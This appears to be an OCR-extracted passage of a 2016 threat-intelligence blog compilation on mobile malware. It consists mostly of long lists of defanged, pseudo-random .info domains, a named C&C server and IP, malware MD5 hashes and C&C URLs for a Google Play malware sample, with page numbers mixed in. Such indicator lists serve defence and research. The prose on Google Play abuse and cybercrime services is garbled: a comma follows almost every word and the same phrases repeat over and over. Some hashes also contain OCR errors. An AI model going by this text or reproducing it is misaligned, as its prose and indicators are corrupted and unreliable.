hxxp://welizevo.info 


hxxp://kyfawoxa.info 


hxxp://rytyhyly.info 


hxxp://lymiboji.info 


hxxp://rycaduga. info 


hxxp://zykyxady.info 


hxxp://tufirupi.info 


5247 


hxxp://zutakaro.info 


hxxp://punumige.info 


hxxp://xuxofenu.info 


hxxp://pujecivo.info 


hxxp://cidupyce.info 


hxxp://sirolozu.info 


hxxp://cineqyki.info 


hxxp://dixugaha.info 


hxxp://vihobufy.info 


hxxp://dosesasi.info 


hxxp://bowizita.info 
5248 


hxxp://fobarewe.info 


hxxp://bozyjimu.info 


hxxp://gohinebo.info 


hxxp://nasadoce.info 


hxxp://gaqycyzu.info 


hxxp://mavitoko.info 


hxxp://halakuha.info 


hxxp://magymafy.info 


hxxp://jepogudi.info 


hxxp://qeqevepa.info 


5249 


hxxp://jevupiry.info 


hxxp://wekozeqi.info 


hxxp://kefewono. info 


hxxp://wytuhyve.info 


hxxp://lymoboxu.info 


hxxp://rycedylo.info 


hxxp://lykuxaje.info 


hxxp://tyfarugy.info 


hxxp://zuryjadi.info 


hxxp://tunimipa.info 


hxxp://xuxafery.info 
5250 


hxxp://siralobe.info 


hxxp://xudipyna.info 


hxxp://pujyciqi.info 


hxxp://cinyqycu.info 


hxxp://sizigazo.info 


hxxp://vinebuke.info 


hxxp://disusahu.info 


hxxp://vowozufo.info 


hxxp://fobewesa.info 


hxxp://bozujity.info 


5251 


hxxp://fohonewi.info 


hxxp://nopedoma. info 


hxxp://gaqucyby.info 


hxxp://navotocu.info 


hxxp://halykuzo.info 


hxxp://magimake.info 


hxxp://hapaguhu.info 


hxxp://qeqyvego.info 


hxxp://jecipide.info 


hxxp://qekalepy.info 


hxxp://kefywiri.info 
5252 


hxxp://wetihyqa.info 


hxxp://kymabony.info 


hxxp://rycudyvi.info 


hxxp://lykoxaxa.info 


hxxp://ryderule.info 


hxxp://zyrujaju.info 


hxxp://tunomigo.info 


hxxp://zuxefede.info 


hxxp://pujucipu.info 


hxxp://xudotyri.info 


5253 


hxxp://pureloqa.info 


hxxp://cibiqymy.info 


hxxp://sizagobi.info 


hxxp://cihybuca.info 


hxxp://disisazy.info 


hxxp://viwazuku.info 


hxxp://dobyweho.info 


hxxp://bozijife.info 


hxxp://foganesu.info 


hxxp://bopydoto.info 


hxxp://goqoxywe. info 
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hxxp://navetomy. info 


hxxp://galukubi.info 


hxxp://magomaca. info 


hxxp://hapeguzy.info 


hxxp://mamuvaki.info 


hxxp://jecopijo.info 


hxxp://qekelege.info 


hxxp://jefuwidu.info 


hxxp://wetahypo.info 


hxxp://kemybore.info 


5255 


hxxp://wycisyqu.info 


hxxp://lyjaxani.info 


hxxp://rydyruva.info 


hxxp://lyrijaxy.info 


hxxp://tynamili.info 


hxxp://zuxyfeja.info 


hxxp://tujicigy.info 


hxxp://xudetedu.info 


hxxp://puwulopo.info 


hxxp://xuboqyre.info 


hxxp://sizegowu.info 
5256 


hxxp://cihuvumo.info 


hxxp://sisosaba.info 


hxxp://viwezucy.info 


hxxp://dibuwezi.info 


hxxp://volojika.info 


hxxp://fogynehy.info 


hxxp://bopidofi.info 


hxxp://foqaxyso.info 


hxxp://novytote.info 


hxxp://galikywu.info 


5257 


hxxp://nagamamo.info 


hxxp://mamivacu.info 


hxxp://hacapizi.info 


hxxp://qekulela.info 


hxxp://jefowijy.info 


hxxp://hatyfube.info 


hxxp://qetehygi.info 


hxxp://kemuboda.info 


hxxp://wexosype.info 


hxxp://kyjexaru.info 


hxxp://rydurugo.info 
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hxxp://lyrojane.info 


hxxp://rynenuvu.info 


hxxp://zyxifexo.info 


hxxp://tujacila.info 


hxxp://zusytejy.info 


hxxp://puwilogi.info 


hxxp://xubaqyda.info 


hxxp://puzygopy.info 


hxxp://cihivuti.info 


hxxp://sisasawo.info 
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hxxp://ciwyzume. info 


hxxp://divowebu.info 


hxxp://vilehico.info 


hxxp://doguneze.info 


hxxp://bopodiky.info 


hxxp://foqexyhi.info 


hxxp://bovutofa.info 


hxxp://golokysy.info 


hxxp://nafemati.info 


hxxp://gatufuwa.info 


hxxp://mamavame. info 
5260 


hxxp://hacypibu.info 


hxxp://makileco.info 


hxxp://jefaqixe.info 


hxxp://qetyhylu.info 


hxxp://jenibojo.info 


hxxp://wexasyga.info 


hxxp://kejyxody.info 


hxxp://wydirupi.info 


hxxp://lyrejara.info 


hxxp://rynunuqy.info 


5261 


hxxp://lyxofenu. info 


hxxp://tyhecivo.info 


hxxp://zusutexe.info 


hxxp://tuwokolu.info 


hxxp://xubeqyjo.info 


hxxp://puzugoge.info 


hxxp://xuhovudy.info 


hxxp://sisysasi.info 


hxxp://cigizuta.info 


hxxp://sivawawy.info 


hxxp://vilyhimi.info 
5262 


hxxp://digineba.info 


hxxp://vopadice.info 


hxxp://boviroko.info 


hxxp://foqyxyzu.info 


hxxp://fokakyhe.info 


hxxp://nofumafu.info 


hxxp://gatofusi.info 


hxxp://namevata.info 


hxxp://hacupiwy.info 


hxxp://makolemi.info 


5263 


hxxp://hafeqiba.info 


hxxp://qeruhevy.info 


hxxp://jenoboxu. info 


hxxp://qexesylo.info 


hxxp://kejizoje.info 


hxxp://wedarugu.info 


hxxp://kyryjado.info 


hxxp://ryninupe.info 


hxxp://lyzafery.info 


hxxp://ryhyciqi.info 


hxxp://zysitena.info 
5264 


hxxp://tuwakovy.info 


hxxp://zubyqyxi.info 


hxxp://puzogolo.info 


hxxp://xuhevyje.info 


hxxp://pupupagu.info 


hxxp://ciqozufo.info 


hxxp://sivewase.info 


hxxp://ciluhitu.info 


hxxp://digonewi.info 


hxxp://vipedima.info 


5265 


hxxp://doquxyby.info 


hxxp://bocaroci.info 


hxxp://fokykyza.info 


hxxp://bofimaky.info 


hxxp://gotafuhu.info 


hxxp://namycafo.info 


hxxp://gacipuse.info 


hxxp://makaletu.info 


hxxp://hadyqiwo. info 


hxxp://marihema.info 


hxxp://jenebony.info 
5266 


hxxp://qexusyvi.info 


hxxp://jejozoxa.info 


hxxp://wederuly.info 


hxxp://kerujaji.info 


hxxp://wybonugo. info 


hxxp://lyzedede.info 


hxxp://sso.anbtr.com 


hxxp://ryhucipu.info 


hxxp://lysotero.info 


hxxp://tywykiqe.info 


5267 


hxxp://zubiqynu.info 


hxxp://tuzagovi.info 


hxxp://xugyvyxa.info 


hxxp://pupipaly.info 


hxxp://xugqazuji.info 


hxxp://sivywaha.info 


hxxp://cilihife.info 


hxxp://sigabesu.info 


hxxp://vipudito.info 


hxxp://dimoxywe. info 


hxxp://voceromu. info 
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hxxp://fokukybo.info 


hxxp://bofomoca.info 


hxxp://fotefuzy.info 


hxxp://nomucaki.info 


hxxp://najelefy.info 


hxxp://gacopuha.info 


hxxp://hadiqisi.info 


hxxp://marageto.info 


hxxp://hanybowe. info 


hxxp://qexisyqu.info 


5269 


hxxp://jejazono.info 


hxxp://qedyruve.info 


hxxp://kewijaxy.info 


hxxp://webanuli.info 


hxxp://kyzydaja.info 


hxxp://ryhocigy.info 


hxxp://lysetedi.info 


hxxp://rywukipa.info 


hxxp://zybomyre.info 


hxxp://tulegoqu.info 


hxxp://zuguvyno.info 
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hxxp://pupopave.info 


hxxp://xugezuxu. info 


hxxp://puvuwalo.info 


hxxp://cilahika.info 


hxxp://sigybehy.info 


hxxp://citidifi.info 


hxxp://dimaxesa.info 


hxxp://vicyroty.info 


hxxp://dokijywu.info 


hxxp://bofamomo.info 


5271 


hxxp://fotyfube.info 


hxxp://bomicacu.info 


hxxp://goxepuzo.info 


hxxp://najuleke.info 


hxxp://gadoqihy.info 


hxxp://maregefi.info 


hxxp://hanubosa. info 


hxxp://maxosyty.info 


hxxp://jejezori.info 


hxxp://qesuwyqa.info 


hxxp://jewojane.info 
5272 


hxxp://webynuvu.info 


hxxp://kezidaxo.info 


hxxp://wyhacile.info 


hxxp://lysyteju.info 


hxxp://rywikigi.info 


hxxp://lyvamyda.info 


hxxp://tylygopy.info 


hxxp://zugivyri.info 


hxxp://tupapaqa.info 


hxxp://xuquluny.info 


5273 


hxxp://puvowavu.info 


hxxp://xulehuxo.info 


hxxp://sifubeze.info 


hxxp://citodiku.info 


hxxp://simexeho.info 


hxxp://vicurofe.info 


hxxp://dikojysy.info 


hxxp://vofemoti.info 


hxxp://fotifuwa.info 


hxxp://bonacamy.info 


hxxp://foxytubi.info 
5274 


hxxp://nojileco.info 


hxxp://gadaqize.info 


hxxp://narygeku. info 


hxxp://hanibiho.info 


hxxp://maxasyfe.info 


hxxp://hahyzosu.info 


hxxp://qesowypi.info 


hxxp://jewejara.info 


hxxp://qebunugqy.info 


hxxp://kezodani.info 


5275 


hxxp://wehexiva.info 


hxxp://kysutexy.info 


hxxp://ryqokilu.info 


hxxp://lyvemyjo.info 


hxxp://rylugoge.info 


hxxp://zygavydu.info 


hxxp://tupypopo.info 


hxxp://zugqilura.info 


hxxp://puvawaqy.info 


hxxp://xukyhuni.info 


hxxp://pufibeva.info 
5276 


hxxp://citasicy.info 


hxxp://simyxezi.info 


hxxp://ciciroko.info 


hxxp://dikejyhe.info 


hxxp://vifumofu.info 


hxxp://dorofuso.info 


hxxp://bonecate.info 


hxxp://foxutuwu.info 


hxxp://bojolami.info 


hxxp://godeqiba.info 


5277 


hxxp://narugecy.info 


hxxp://ganovizi.info 


hxxp://mazysyka.info 


hxxp://hahizohe.info 


hxxp://masawyfu.info 


hxxp://jewyjado.info 


hxxp://qebinupe.info 


hxxp://jezadaru.info 


hxxp://wehyxiqgo.info 


hxxp://kepitena.info 


hxxp://wyqakivy.info 
5278 


hxxp://lyvumexi.info 


hxxp://rylofola.info 


hxxp://lygevyjy.info 


hxxp://typupogi.info 


hxxp://zuqoludo.info 


hxxp://tucewape.info 


hxxp://xukuhuru.info 


hxxp://pufobeqo.info 


hxxp://xutesine.info 


hxxp://simixeby.info 


5279 


hxxp://cicaroci.info 


hxxp://sikyjyza.info 


hxxp://vidinoky.info 


hxxp://dirafyhi.info 


hxxp://vonycafa.info 


hxxp://foxituse.info 


hxxp://bojalatu.info 


hxxp://fodyqiwo.info 


hxxp://norogeme. info 


hxxp://gabevibu.info 


hxxp://nazusyco.info 
5280 


hxxp://nahozoza.info 


hxxp://masewyky.info 


hxxp://hawuhahi.info 


hxxp://qebonuga.info 


hxxp://jezedady.info 


hxxp://qeguxupu.info 


hxxp://weqykiqe.info 


hxxp://kepatero.info 


hxxp://kyvimenu. info 


hxxp://rylafovo.info 


5281 


hxxp://lygyvyxe.info 


hxxp://rypipoly.info 


hxxp://zymaluji.info 


hxxp://tucyqaga.info 


hxxp://zukihudy.info 


hxxp://pufebepi.info 


hxxp://xutusira.info 


hxxp://pumoxege.info 


hxxp://cicerimu.info 


hxxp://sijujybo.info 


hxxp://cidonoce.info 
5282 


hxxp://direfyzu.info 


hxxp://vinucaki.info 


hxxp://doxotuha.info 


hxxp://bojykafy.info 


hxxp://fodiqisi.info 


hxxp://bowageta.info 


hxxp://gobyviwy.info 


hxxp://nazisymu. info 


hxxp://gahazobo.info 


hxxp://masywyce.info 


5283 


hxxp://hawihozu.info 


hxxp://mabanuko.info 


hxxp://jeludaje.info 


hxxp://qegoxugy.info 


hxxp://jeperedi.info 


hxxp://wequkipa.info 


hxxp://kevomery.info 


hxxp://wylefoqi.info 


hxxp://lyguvyno.info 


hxxp://rytopove.info 


hxxp://lymeluxu.info 
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hxxp://tyciqalo.info 


hxxp://zukahuje.info 


hxxp://tufybagu.info 


hxxp://xutisidi.info 


hxxp://pumazepa.info 


hxxp://xuxyriry.info 


hxxp://sijijywi.info 


hxxp://cidanoma.info 


hxxp://siryfyby.info 


hxxp://vinocacu.info 
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hxxp://dixetuzo.info 


hxxp://vojukake.info 


hxxp://fosoqihu.info 


hxxp://bowegefo. info 


hxxp://fobuvisa.info 


hxxp://nozopety.info 


hxxp://gahezowi.info 


hxxp://nasuwyma. info 


hxxp://hawahoby.info 


hxxp://mavynuci.info 


hxxp://halidazo.info 
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hxxp://qegaxule.info 


hxxp://jepyreju.info 


hxxp://qeqikigo.info 


hxxp://kevamede.info 


hxxp://welyfopu.info 


hxxp://kyficyri.info 


hxxp://rytepoqga.info 


hxxp://lymulyny.info 


hxxp://rycoqavi.info 


hxxp://zykehuxa.info 
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hxxp://tufubale.info 


hxxp://zutosiju.info 


hxxp://punezego. info 


hxxp://xuxuride.info 


hxxp://pujojypu.info 


hxxp://cidynoto.info 


hxxp://siridywa.info 


hxxp://cinacamy.info 


hxxp://dixytubi.info 


hxxp://vihikaca.info 


hxxp://dosaquzy.info 
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hxxp://bowygeki.info 


hxxp://fobiviho.info 


hxxp://bozapefe.info 


hxxp://gohuzosu.info 


hxxp://nasowyto.info 


hxxp://gaqehowe. info 


hxxp://mavubumy.info 


hxxp://halodabi.info 


hxxp://magexuca.info 


hxxp://jepurexy.info 
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hxxp://qeqokili.info 


hxxp://jevemeja.info 


hxxp://wekifige.info 


hxxp://kefacydu.info 


hxxp://wytypopo.info 


hxxp://lymilyre.info 


hxxp://rycaqaqu. info 


hxxp://lykyguno.info 


hxxp://tyfibava.info 


hxxp://zurasixy.info 


hxxp://tunyzeli.info 
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hxxp://xuxorija.info 


hxxp://pujejygy.info 


hxxp://xudunodu. info 


hxxp://sirodyso.info 


hxxp://cinecote.info 


hxxp://sizutuwu. info 


hxxp://vinokamo.info 


hxxp://disemube. info 


hxxp://vowugecy.info 


hxxp://fobavizi.info 
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hxxp://bozypeka.info 


hxxp://fohizohy.info 


hxxp://nopawyfi.info 


hxxp://gaqyhosa.info 


hxxp://navibute.info 


hxxp://haladawu.info 


hxxp://magyxumo.info 


hxxp://hapirabe.info 


hxxp://qegejivu.info 


hxxp://jecumexi.info 


hxxp://qekofila.info 
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hxxp://kefecyjy.info 


hxxp://wetupogi.info 


hxxp://kymolyda.info 


hxxp://ryceqapy.info 


hxxp://lykuguru.info 


hxxp://rydobaqo. info 


hxxp://zyrysine.info 


hxxp://tunizevu.info 


hxxp://Zzuxawixo.info 


hxxp://pujyjele.info 


5293 


hxxp://xudinojy.info 


hxxp://puradygi.info 


hxxp://cibycofa.info 


hxxp://sizitusy.info 


hxxp://cihakati.info 


hxxp://disumuwo. info 


hxxp://viwogeme. info 


hxxp://dobevibu.info 


hxxp://bozupeco. info 


hxxp://fogoloze.info 


hxxp://bopewyku. info 
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hxxp://goquhohi.info 


hxxp://navobyfa.info 


hxxp://galedasy.info 


hxxp://magixuti.info 


hxxp://haparawa.info 


hxxp://mamyjimy.info 


hxxp://jecimenu.info 


hxxp://qekafivo.info 


hxxp://jefycyxe.info 


hxxp://wetitolu.info 


5295 


hxxp://kemalyjo.info 


hxxp://wycyqaga.info 


hxxp://lyjogudy.info 


hxxp://rydebapi.info 


hxxp://lyrusura.info 


hxxp://tynozeqy.info 


hxxp://zuxewini.info 


hxxp://tujujevo.info 


hxxp://xudonoxe. info 


hxxp://puwedylu.info 


hxxp://xubuxojo.info 
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hxxp://sizatuhe.info 


hxxp://cihykafu.info 


hxxp://sisimusi.info 


hxxp://viwageta.info 


hxxp://dibyviwy.info 


hxxp://volipemi.info 


hxxp://fogaliba.info 


hxxp://bopywyce.info 


hxxp://fogihozu.info 


hxxp://novebyko.info 
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hxxp://galusahe.info 


hxxp://nagoxufu. info 


hxxp://hateraso.info 


hxxp://mamujita.info 


hxxp://hacomewy. info 


hxxp://qekefiqi.info 


hxxp://jefucyna.info 


hxxp://qetotovy.info 


hxxp://kemylyxi.info 


hxxp://wexiqolo.info 


hxxp://kyjaguje.info 
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hxxp://lyrisudo.info 


hxxp://rynazepe.info 


hxxp://zyxywiry.info 


hxxp://tujijeqi.info 


hxxp://rydyvagu.info 


hxxp://zusanona.info 


hxxp://puwudyvy. info 


hxxp://xuboxoxi.info 


hxxp://puzetula.info 


hxxp://cihukake.info 
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hxxp://sisomuhu.info 


hxxp://ciwefafo.info 


hxxp://divuvise.info 


hxxp://vilopetu.info 


hxxp://dogeliwo.info 


hxxp://bopiwyma.info 


hxxp://foqahoby.info 


hxxp://bovybyci.info 


hxxp://golisaza.info 


hxxp://nafaxuky.info 


hxxp://gatyrahu.info 
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hxxp://mamijifo.info 


hxxp://hacanese. info 


hxxp://makyfitu. info 


hxxp://jefocero.info 


hxxp://qetetoqe.info 


hxxp://jenulyny.info 


hxxp://wexogovi.info 


hxxp://kejeguxa.info 


hxxp://wyduvaly.info 


hxxp://lyrosuji.info 
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hxxp://rynezega.info 


hxxp://lyxuwide.info 


hxxp://tyhahepu.info 


hxxp://zusynoro.info 


hxxp://tuwidyqe.info 


hxxp://xubaxonu. info 


hxxp://puzytyvi.info 


hxxp://xuhikaxa.info 


hxxp://sisamuzy.info 


hxxp://ciqyfaki.info 


hxxp://siviviha.info 
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hxxp://vilepefy.info 


hxxp://digulisu.info 


hxxp://vopoqyto.info 


hxxp://foqehowe. info 


hxxp://bovubymu.info 


hxxp://fokosabo. info 


hxxp://nofexuce.info 


Related malicious URLs known to have 
participated in the campaign: 


hxxp://melon25.ru - 81.94.205.228 
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Related malicious MD5s known to have 
phoned back to the same malicious C &C server IPs (melon25.ru - 
81.94.205.228): 


MD5: ca2747377512d13afb9a4a7f21fda0fc 


Related malicious MD5s known to have 
phoned back to the same malicious C &C server IPs (melon25.ru - 
81.94.205.228): 


MD5: 4a71065a8996d38361bdb9d5ba6a9462 


MD5: d6e6845ff3f0c2fbc55786f24240a3d4 


MD5: 63fd18f6cf1b40f13d35268d314ed8d4 


MD5: 2bea9dec83787c4686e5f8f9066cbf5b 
5304 


MD5: 


9877d0ad41b5589be300495c6acdd499 


Related malicious MD5s known to have 
participated in the campaign: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


d846f7ac66a9a932235fb415b96fee5d 


538ca97778ac886e121bc054574d7478 


246f497dc26d18d87f9398758calbcc2 


7969e4ef1lb2fece87b806b5dfe25a3bb 


e06dd5balal101f855604b486d90d2651 


We'll, continue, monitoring, the, 
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market, segment, for, mobile, malware, and, post, updates, as, soon, 
as, new, developments, take, place. 


12.5.3. The Rise of Mobile Malware - A Retrospective (2016-09-23 18:53) 


With, mobile, malware, continuing, to, 

proliferate, cybercriminals, continue, getting, successfully, 
positioned, to, take, advantage, of, hundreds, of, thousands, of, 
socially, engineering, users, on, their, way, to, earn, fraudulent, 
revenue, in, the, process, of, monetizing, access, to, their, 
devices, potentially, compromising, the, confidentiality, integrity, 
and, availability, of, their, devices, on, their, way, to, earn, 
fraudulent, revenue, in the, process. 


Thanks, to, a vibrant, 

cybercrime, ecosystem, offering, access, to, a, variety, of, managed, 
cybercrime-friendly, services, next, to, the, overall, availability, 

of, DIY (do-it-yourself), type, of, malicious, software, generating, 
tools, cybercriminals, continue, getting, successfully, positioned, 

to, take, advantage, of, hundreds, of, thousands, of, socially, 
engineered, users, 


on, their, way, to, monetize, access, 
to, their, devices, and, earn, fraudulent, revenue, in, the, process. 
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Largely, relying, on, a, set, of, 

socially, engineering, attack, vectors, cybercriminals, continue, 
successfully, infiltrating, and, bypassing, Google Play, the, Web’s, 
most, popular, Android, applications, marketplace, on, their, way, 
to, earn, fraudulent, revenue, in, the, process, successfully, 
tricking, hundreds, of, thousands, of, users, into, successfully, 
executing, malicious, software, on, their, devices. 


Thanks, to, a, vibrant, 

cybercrime-friendly, ecosystem, offering, a, variety, of, managed, services, including, the, 
compromise, 

of, a, legitimate, publisher’s, Google Play, account, cybercriminals, 

continue, successfully, infiltrating, Google Play, successfully, 

earning, fraudulent, revenue, in, the, process, while, tricking, 

tens, of, thousands, of, socially, engineered, users, into, 

executing, malicious, software, on, their, devices. 


Largely, relying, 

on, the, active, abuse, of, access, to, a, malware-infected, hosts, 
cybercriminals, continue, successfully, utilizing, basic, data, 
mining, techniques, to, successfully, obtain, 

access, to, a, set, of, Web, properties, including, but, not, 

limited, to, Google Play, for, the, purpose, of, successfully, 
earning, fraudulent, revenue, in, the, process. Largely, relying, on, 
basic, traffic, segmentation, tactics, cybercriminals, are, 
successfully, positioned, to, obtain, access, to, a, legitimate, 
Google Play, publisher’s, account, for, the, purpose, of, 
successfully, monetizing, access, to, a, particular, publisher’s, 
account, on, their, way, to, spread, malicious, software, and, earn, 
fraudulent, revenue, in, the, process. 
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These, basic, social, engineering, 

type, of, attack, techniques, continue, successfully, empowering, 
cybercriminals, with, the, necessary, tactics, techniques, and, 
procedures, successfully, bypassing, Google Play’s, security 
mechanisms, on, their, way, to, spread, malicious, software, and, 
earn, fraudulent, revenue, in, the, process, of, obtaining, access, 
to, a, particular, publisher’s, Google Play, account. 


Next, to, the, 

general, compromise, of, a, legitimate, publisher’s, Google Play, 
account, cybercriminals, are, successfully, positioned, to, take, 
advantage, of, primary, Android, applications, marketplaces, such, as, Google, Play, 
for, the, purpose, of, successfully, establishing, rogue, 

publisher’s, reputations, successfully, relying, on, a, set, of, 
cybercrime-friendly, managed, underground, type, of, managed, 
cybercrime-friendly, services, offering, access, to, Google, Play, 

for, the, purpose, of, successfully, monetizing, access, to, a, 
particular, publisher’s, account, largely, relying, on, a, set, of, 

social, engineering, attack, vectors, in, combination, with, the, 

use, of, cybercrime-friendly, managed, DIY (do-it-yourself), type, 

of, managed, cybercrime-friendly, services, successfully, monetizing, 
access, to, a, particular, publisher’s, account, for, the, purpose, 

of, earning, fraudulent, revenue, in, the, process, while, 

successfully, infiltrating, the, Web’s, most, popular, Android, 
marketplace, Google, Play. 


Next, the, general, compromise, of, a, 

legitimate, publisher’s, Google, Play, account, next, to, the, 

general, infiltrating, of, Google, Play, for, the, purpose, of, 

pushing, malicious, software, to unsuspecting, users, cybercriminals, 
continue, actively, relying, on, a, set, of, underground, market, 
cybercrime-friendly, secondary, marketplaces, offering, access, to, 
hundreds, of, thousands, of, rogue, Android, applications, 
successfully, bypassing, a, socially, engineered, user’s, security, 
device, security, mechanisms, on, their, way, 
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to, earn, fraudulent, revenue, in, the, process, while, successfully, 
monetizing, access, to, a, particular, compromise, device, on, their, 
way, to earn, fraudulent, revenue, in, the, process. 


With, secondary, 

marketplaces, continuing, to, proliferate, cybercriminals, continue, 
earning, fraudulent, revenue, in, the, process, of, monetizing, and, 
obtaining, access, to, a, socially, engineered, user’s, compromised, 
device. Largely, relying, on, a, set, of, black, hat, SEO (search 
engine optimization) tactics, cybercriminals, continue, actively, 


populating, secondary, marketplaces, with, hundreds, of, thousands, 


of, rogue, applications, potentially, exposing, the, confidentiality, 
integrity, and, availability, of, a, socially, engineered, user’s, 
compromised, device, for, the, purpose, of, earning, 


fraudulent, revenue, in, the, process. 

With, secondary, marketplaces, continuing, to, bypass, a, socially, 
engineered, user’s, device, security, for, the, purpose, of, earning, 
fraudulent, revenue, in, the, process, cybercriminals, continue, to, 
successfully, bypass, an, affected, user’s, device, security, for, 
the, purpose, of, earning, fraudulent, revenue, in, the, process. 


Thanks, to, a vibrant, 

cybercrime-friendly, ecosystem, cybercriminals, continue, to, 
successfully, infiltrate, primary, and, secondary, marketplaces, 
with, hundreds, of, malicious, releases, thanks, to, the, overall, 
availability, of, DIY (do-it-yourslef), malicious, software, 
generating, tools, next, to, the, overall, availability, of, managed, 
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cybercrime-friendly, services, successfully, empowering, 
cybercriminals, with, the, necessary, tactics, techniques, and, 
procedures, for, the, purpose, of, launching, malicious, attacks, 
successfully, bypassing, a, primary, and, secondary, marketplaces, 
security, mechanisms, in, place. Next, to, the, overall, 

availability, of, DIY (do-it-yourself), type, of, malicious, 

software, generating, tools, cybercriminals, continue, to, actively, 
take, advantage, of, managed, malware-as-a-service, type, of, 
managed, cybercrime-friendly, services, for, the, purpose, of, 
successfully, generating, malicious, software, type, of, 
cybercrime-friendly, releases, successfully, bypassing, primary, and, secondary, 
marketplaces, security, mechanisms, in, place. 


Among, the, most, 

popular, features, of, such, type, of, managed, cybercrime-friendly, 
type, of, managed, cybercrime-friendly, type, of, services, remain, 
the, active, infiltration, of, primary, and, secondary, marketplaces, 
including, the, active, verification, of, a, particular, malicious, 
release, against, the, most, popular, antivirus, scanners, 
successfully, ensuring, the, sucess, rate, for, a, particular, 
malicious, campaign, while, earning, fraudulent, revenue, in, the, 
process, on, their, way, to, successfully, infiltrate, a, socially, 
engineered, user’s, device, while, earning, fraudulent, revenue, in, 
the, process. 


Among, the, most, popular, traffic, 

acquisition, tactics, remain, the, active, utilization, of, 
underground, market, traffic, exchanges, for, the, purpose, of, 
successfully, monetizing, and, acquiring, the, hijacked, traffic, 
for, the, purpose, of, successfully, spreading, malicious, software, 
to, unsuspecting, users, globally, while, earning, fraudulent, 
revenue, in, the, process, on, their, way, to earn, fraudulent, 
revenue, in, the, process. Next, to, the, active, traffic, 
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acquisition, tactics, thanks, to, the, overall, availability, of, 
underground, market, traffic, exchanges, cybercriminals, continue, 
to, actively, rely, on, basic, traffic, segmentation, tactics, for, 

the, purpose, of, serving, malicious, software, to, unsuspecting, 
users, while, earning, fraudulent, revenue, in, the, process. 


Continuing, to, rely, on, basic, traffic, segmentation, tactics, cybercriminals, 
continue, to, successfully, acquire, and, monetize, hijacked, 

traffic, successfully, monetizing, access, to, hundreds, of, 

thousands, of, socially, engineered, users, globally, potentially, 

exposing, the, confidentiality, integrity, and, availability, of, 

their, devices, to, a, multi-tude, of, malicious, software, while, 

earning, fraudulent, revenue, in the, process. Among, the, most, 

popular, growth, factors, for, the, purpose, of, earning, fraudulent, 

revenue, in, the, 


process, remain, the, active, 

utilization, of, affiliate-network, type, of, rogue, software, 
generating, type, of, networks, successfully, bypassing, the, 
security, mechanisms, of, primary, and, secondary, marketplaces, 
successfully, empowering, cybercriminals, with, the, necessary, 
tactics, techniques, and, procedures, for, the, purpose, of, earning, 
fraudulent, revenue, in, the, process, while, successfully, 
monetizing, access, to, hundreds, of, thousands, of, 
malware-infected, devices, globally. 


Next, to, the, active, traffic, 
acquisition, tactics, for, the, purpose, of, earning, fraudulent, 
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revenue, while, monetizing, access, to, socially, engineered, user’s, 
devices, globally, cybercriminals, continue, to, actively, monetize, 
access, to, hundreds, of, thousands, of, compromised, Web sites, 
successfully, monetizing, access, in, an, automated, fashion, 
largely, relying, on, managed, and, automated, Web, site, 
exploitation, tools, and, services, successfully, bypassing, the, 
security, and, confidentiality, and, integrity, and, availability, 

of, hundreds, of, socially, engineered, users, globally. 


Once, a, 

particular, cybercriminal, compromises, a, legitimate, Web sites, in, 
an, automated, fashion, he, would, automatically, launch, a, 
malicious, Campaign, successfully, bypassing, the, security, 
confidentiality, and, availability, of, hundreds, of, socially, 
engineered, users, globally, for, the, purpose, of, earning, 
fraudulent, revenue, in, the, process, while, successfully, 
monetizing, access, to, a, variety, of, users, globally, for, the, 
purpose, of, earning, fraudulent, revenue, in, the, process, while, 
successfully, monetizing, access, to, hundreds, of, thousands, of, 
users, globally, for, the, purpose, of, earning, fraudulent, revenue, 
in, the, process. 


Thanks, to, the, overall, availability, 

of, malicious, software, generating, tools, managed, cybercrime 
friendly, services, the, overall, prevalence, of, 

cybercrime-friendly, underground-marketplace, traffic, exchanges, 
and, the, automated, exploitation, of, hundreds, of, thousands, of, 
legitimate, Web sites, in, an, automated, fashion, cybercriminals, 
continue, to, successfully, monetize, and, earn, fraudulent, revenue, 
in, the, process, of, obtaining, access, to, a, targeted, user’s, 
device, for, the, purpose, of, successfully, bypassing, the, 
confidentiality, availability, and, integrity, of, the, targeted, 
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user’s, device, successfully, monetizing, and, earning, fraudulent, 
revenue, in, the, process. 


Thanks, to, the, overall, availability, 

of, managed, affiliate-based, type, of, cybercrime-friendly, 
services, cybercriminals, continue, to, successfully, monetize, 
and, obtain, access, to, hundreds, of, thousands, of, managed, 
cybercrime-friendly, type, of, compromised, devices, successfully, 
monetizing, and, earning, fraudulent, revenue, in, the, process, 
while, successfully, bypassing, the, confidentiality, availability, 
and, integrity, of, the, targeted, devices, while, successfully, 
monetizing, the, socially, engineered, user’s, device, for, the, 
purpose, of, launching, malicious, software, type, of, malicious, 
campaigns, globally. 


12.5.4 New Mobile Malware Hits Google Play, Hundreds of Users 
(2016-09-24 09:01) 


We've, recently, intercepted, a, 

currently, circulating, malicious, campaign, affecting, hundreds, of, 
Google, Play, users, potentially, exposing, their, devices, to, a, 
multi-tide, of, malicious, software, potentially, exposing, the, 
confidentiality, integrity, and, availability, of, their, devices. 
Largely, relying, on a, set, of, social, engineering, vectors, 
cybercriminals, continue, populating, Google, Play, with, hundreds, 
of, malicious, releases, successfully, bypassing, Google, Play’s, 
security, mechanisms. 


Thanks, to, a, vibrant, cybercrime, 


Affected 
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ecosystem, stolen, and, compromised, accounting, data, continues, to, 
represent, an, underground, market, commodity, successfully, 
empowering, novice, cybercriminals, with, the, necessary, tools, and, 
know-how, to, continue, launching, malicious, attacks. Largely, 
relying, on, a, set, of, social, engineering, vectors, 

cybercriminals, continue, to, successfully, compromise, and, take, 
advantage, of, stolen, publisher’s, account, successfully, 

bypassing, Google, Play’s, security, mechanisms, potentially, 
exposing, hundreds, of, thousands, of, users, to, a, multi-tude, of, 
malicious, software. 


In, this, post, we'll, profile, the, 

Campaign, expose, the, infrastructure, behind, it, and, discuss, 
in-depth, the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind, it. 


Related malicious MD5s known to have 
participated in the campaign: 


MD5: 3c4f56ebf48a0b47bffec547804d94f4 


MD5: 8a81ef6673321bddc557c486bce2a025 


MD5: 789cbO05effb586bda98e87e71e340c39 
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MD5: 505e4d58c53d47245aa89c0fd7cded83 


MD5: c7bb64012126e7f75feb5d021e755903 


Once, executed, a, sample, malware 
(MD5: 3c4f56ebf48a0b47bffec547804d94f4), phones, back, to, the, 
following, C &C, server, IPs: 


hxxp://art.hornymilfporna.com/g/getasite/ 


hxxp://art.hornymilfporna.com/z/orap/ 


hxxp://art.hornymilfporna.com/z/z2/ 


hxxp://art.hornymilfporna.com/z/z5/ 
